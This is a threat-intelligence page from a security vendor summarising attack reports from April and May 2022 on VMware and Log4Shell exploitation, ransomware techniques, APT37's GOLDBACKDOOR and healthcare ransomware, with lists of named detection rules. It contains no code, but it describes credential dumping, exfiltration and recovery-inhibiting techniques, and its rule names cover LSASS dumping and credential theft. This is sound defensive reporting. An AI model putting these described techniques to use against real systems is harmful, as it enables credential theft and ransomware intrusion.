The Anvilogic Threat Reports

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge.

We are committed to (read more…)

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge. We are committed to helping the community detect attacks by helping your team look for malicious exploit strings, as well as, run exposure checks on your endpoint devices/servers, which can help identify a successful payload delivery and compromise using this vulnerability.

Intelligence Levels
  • Tactical: Detectable threat behaviors for response with threat scenarios or threat identifiers
  • Strategic: General information security news, for awareness
About the Team

The Anvilogic Forge is a team of security professionals dedicated to tracking threats and crafting reliable detection strategies for our trusted clients while contributing to our peers in the security industry.

Our mission is to assess the operational behaviors of all threats to provide the community, and our customers, with actionable information and enterprise-ready detections in order to defend themselves in an ever-changing threat landscape.

Our Craft

Curate threat intelligence to provide situational awareness and actionable intelligence to our clients. The results of our crafts are:

  • Detections
    • Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
    • Threat Scenarios: risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
  • Reports Hot off the forge:
    • Threat News Reports
    • Trending Threat Reports
    • Research Articles
Want more?

If this information is useful, please feel free to get in touch with us to see how Anvilogic can help you grow your security operations at yo@anvilogic.com.

Sign-up for Anvilogic’s weekly threat reports and receive a threat round-up, active notifications of relevant threats to harden your security posture, and ready-to-deploy threat detection logic & content associated with applicable trending threats.

If you are not a customer but would like to get the detection code for a specific vulnerability or exploit, reach out to us we’re happy to help: detection.support@anvilogic.com

Learn More about The Anvilogic Threat Detection and Incident Response (TDIR) Platform

(read less…)

VMware Workspace ONE Access Vulnerabilities

May 03, 2022

VMware Workspace ONE Access Vulnerabilities

Industry: N/A | Level: Tactical | Source: Morphisec

On April 14th and 15th, 2022, Morphisec identified the exploitation of vulnerabilities associated with VMware Workspace ONE Access. Out off the three vulnerabilities resulting in potential remote code execution, CVE-2022-22954 was the most critical as it does not require administrative access to the server, while CVE-2022-22957 and CVE-2022-22958 do. The vulnerability is lucrative to threat actors given the adoption of VMWare, and the large attack surface it presents, “Adversaries can use this attack to deploy ransomware or coin miners, as part of their initial access, lateral movement, or privilege escalation. Morphisec research observed attackers already exploiting this vulnerability to launch reverse HTTPS backdoors—mainly Cobalt Strike, Metasploit, or Core Impact beacons.” The tactics, techniques, and procedures observed in an attack chain for the vulnerability were identified to be similar to Rocket Kitten, an Iranian-based threat actor group. An observed exploit involved compromising the VMWare Identity Manager Service to deploy a PowerShell stager to download a PowerShell script dubbed, PowerTrash loader to push a Core Impact Agent (developed by Core Security as part of a penetration testing framework) into memory.

  • Anvilogic Use Case: VMware ONE CVE-2022-22954

Log4Shell Vulnerability Vast & Abundant

May 03, 2022

Log4Shell Vulnerability Vast & Abundant

Industry: N/A | Level: Tactical | Source: Rezilion

Since December 2021, the attack surface from the Log4Shell vulnerability has continued to be far-reaching. Research from Rezilion identified, four months have gone by, and the vulnerability is present in many software products, and continues to be downloaded and unpatched. Utilizing Sonatype’s “Log4j Download Dashboard”, downloads with vulnerable Log4j versions are still present, as of April 26th, 2022, there has been 35% (395,281) vulnerable downloads. Further analysis has identified many Log4Shell components remain unpatched, “When exploring the components affected by the Log4Shell vulnerability, i.e. components using org.apache.logging.log4j:log4j-core, it appears that out of a total of 17.84K affected packages, only 7.14K are patched for Log4Shell. This means that almost 60% of vulnerable packages are not yet patched!” Various factors could contribute to users continuing to download vulnerable versions, including lack of awareness of the vulnerability, and inability to detect it, as well as the potential of utilizing third-party software containing the vulnerability. The need to detect and/or patch against Log4Shell remains crucial given the severity and ease of the vulnerability. Reported threat groups attempting to exploit the vulnerability include HAFNIUM, APT35, Tunnel Vision, and APT41/Deep Panda.

  • Anvilogic Scenario: Common Log4Shell Payload
  • Anvilogic Use Case: Potential CVE-2021-44228 – Log4Shell

Ransomware Attack Techniques

May 03, 2022

Ransomware Attack Techniques

Industry: N/A | Level: Tactical | Source: Symantec

Symantec’s analysis of ransomware groups Hive, Conti, and Avoslocker, have identified frequently utilized tools, tactics, and procedures (TTPs). During the initial access stage of the attack, the ransomware operators leverage exploits, RDP from weak or compromised credentials, and malware deployment through phishing emails involving IcedID, Emotet, QakBot, or TrickBot. Persistence involved the use of third-party remote software such as AnyDesk and ConnectWise Control along with modifications to the firewall and registry. Tools used for system discovery include ADRecon and Netscan. Credential access is achieved with a vast array of techniques involving Mimikatz, comsvcs.dll, extracting credentials from the registry, and using task manager to dump LSASS memory. Tools used for lateral movement includes PsExec, WMI, BITSAdmin, and Mimikatz. The tampering of Windows logs helped cover the attacker’s tracks. Data recovery is inhibited by deleting shadow copies. Lastly, for data exfiltration, actors relied on RClone and FileZilla to transfer data.

  • Anvilogic Use Cases:
    • Registry key added with reg.exe
    • Windows Firewall Rule Creation
    • Mimikatz
    • Invoke-Expression Command
    • comsvcs.dll Lsass Memory Dump
    • Rundll32 Command Line
    • Task Manager lsass Dump
    • Credentials in Registry
    • Remote Admin Tools
    • WinRM Tools
    • BITSadmin Execution
    • Clear Windows Event Logs
    • Inhibit System Recovery Commands
    • Suspicious Registry Key Deleted
    • Rclone Execution

APT37 Targeting Journalists and Researchers

May 03, 2022

APT37 Targeting Journalists and Researchers

Industry: Media | Level: Tactical | Source: Stairwell

NK News, an American news source reporting activities in North Korea, has identified of suspicious spear-phishing emails as a threat campaign by the North Korean threat group, APT37/Richochet Chollima. The campaign appears to be targeting journalists and researchers reporting sensitive issues within the country. The news organization engaged Stairwell’s cybersecurity team, in March 2022, discovering a new malware named, GOLDBACKDOOR. The threat group employs a multi-stage infection process to evade defenses. A compressed file is attached to the suspicious email containing Windows LNK, shortcut files. When the shortcut files are executed, PowerShell scripts are launched presenting a decoy document to distract the victim whilst downloading and executing malicious shellcode. The downloaded payload, Fantasy, then conducts process injection to deploy GOLDBACKDOOR malware. GOLDBACKDOOR, is identified as a Windows Portable Executable (PE) file with a creation timestamp of February 9th, 2022, 02:38:30 UTC. As analyzed by Stairwell, “Embedded in the analyzed copy of GOLDBACKDOOR is a set of API keys used to authenticate against Azure and retrieve commands for execution. Received commands are prefixed with a single-character value, which denotes the corresponding task requested of the malware. GOLDBACKDOOR provides attackers with basic remote command execution, file downloading/uploading, keylogging, and the ability to remotely uninstall.”

  • Anvilogic Scenario: APT37 – GOLDBACKDOOR – Initial Infection
  • Anvilogic Use Cases:
    • Compressed File Execution
    • Symbolic OR Hard File Link Created
    • Suspicious Executable by CMD.exe
    • Invoke-Expression Command
    • Rare Remote Thread

Red Canary’s Intelligence Insights

May 03, 2022

Red Canary’s Intelligence Insights

Industry: N/A | Level: Tactical | Source: RedCanary

Red Canary’s intelligence insights of threats observed during March 2022 have identified a shift in rankings. SocGholish, previously the top threat slipping to number #8 on the list and Impacket claiming the top spot. The top five threat rankings (highest to least) include Impacket, Mimikatz, Yellow Cockatoo, Cobalt Strike, and BloodHound. Additionally, Emotet has risen on the threat list to the 6th spot (previously #8, and Qbot/Qakbot has dropped to 9th (previously #4)). The Qbot malware was observed in April 2022, adjusting it’s delivery techniques to now incorporate Windows Installer (MSI) packages, when previously utilizing malicious office macros and compressed zip files. Microsoft’s decision to block VBA macros by default, since January 2022, has caused threat actors to adjust.

  • Anvilogic Use Cases:
    • Suspicious Email Attachment
    • Compressed File Execution
    • MSIExec Install MSI File

Tricks from SocGholish and Zloader

May 03, 2022

In the latest report by Cybereason, tracking of malware activity from SocGholish and Zloader has detailed the malware’s capabilities and infection tactics. SocGholish is named (partially) due to its social engineering tactics to lure victims with drive-by-downloads, often themed as critical browser updates.

Austin Peay State University Ransomware Attack

May 03, 2022

Austin Peay State University Ransomware Attack

Industry: Education | Level: Strategic | Source: TheRecord

A ransomware attack impacted Austin Peay State University, on the afternoon of Wednesday, April 27th, 2022. The university’s official Twitter account notified students to disconnect their devices from the university’s network, “We are under a ransomware attack. If your computer is connected to the APSU network, please disconnect IMMEDIATELY.” The incident is said to be “contained” by the university’s executive director Bill Persinger. No impact is expected to disrupt studies, as classes have concluded with students focusing on examinations. No identification is made of the ransomware group responsible for the attack.

Kaspersky Releases Decryptor for Yanluowang Ransomware

April 26, 2022

Kaspersky Releases Decryptor for Yanluowang Ransomware

Industry: N/A | Level: Strategic | Source: Securelist

Kaspersky has identified a vulnerability in Yanluowang ransomware and provided a free decryptor for the malware. Yanluowang ransomware is a relatively new strain of ransomware observed in August 2021. The ransomware has targeted victims in the United States, Brazil, Turkey, and other countries. Few victims have come forward and the victim count is suspected to be low due to the targeted nature of the ransomware group’s campaigns. As shared from Kaspersky using publicly collected information, “it is only used in targeted attacks rather than in other RaaS families. Yanluowang itself needs parameters to be executed in the system, meaning it will be executed either manually or through a combination of scripts in the compromised system.”

Impact of Conti Ransomware on the Healthcare Industry

April 26, 2022

Impact of Conti Ransomware on the Healthcare Industry

Industry: Healthcare | Level: Strategic | Source: Krebs On Security

The impact of Conti and Ryuk ransomware on the Healthcare industry has been substantial. As reported by Brian Krebs and findings from the Health Information Sharing & Analysis Center (H-ISAC) chief security officer, Errol Weiss, have declared the impact of ransomware on hospitals has been dangerous causing disruptions to IT systems and the cancellation or delay of patient care services. In addition, with the nature of ransomware, the cost of incidents has been significant requiring payment, incident analysis, and remediation of impacted systems. As identified by Ireland’s Health Service Executive, a ransomware incident that had occurred in May 2021 amassed over $600 million in costs for recovery. Ryuk/Conti has seen this vector as a prime target, and since 2020 the threat actors have compromised more than 400 healthcare facilities. Figures reported for ransomware against the healthcare industry haven’t been reliably reported, it is likely to be underreported given companies would like to keep the breach confidential and not attract public attention.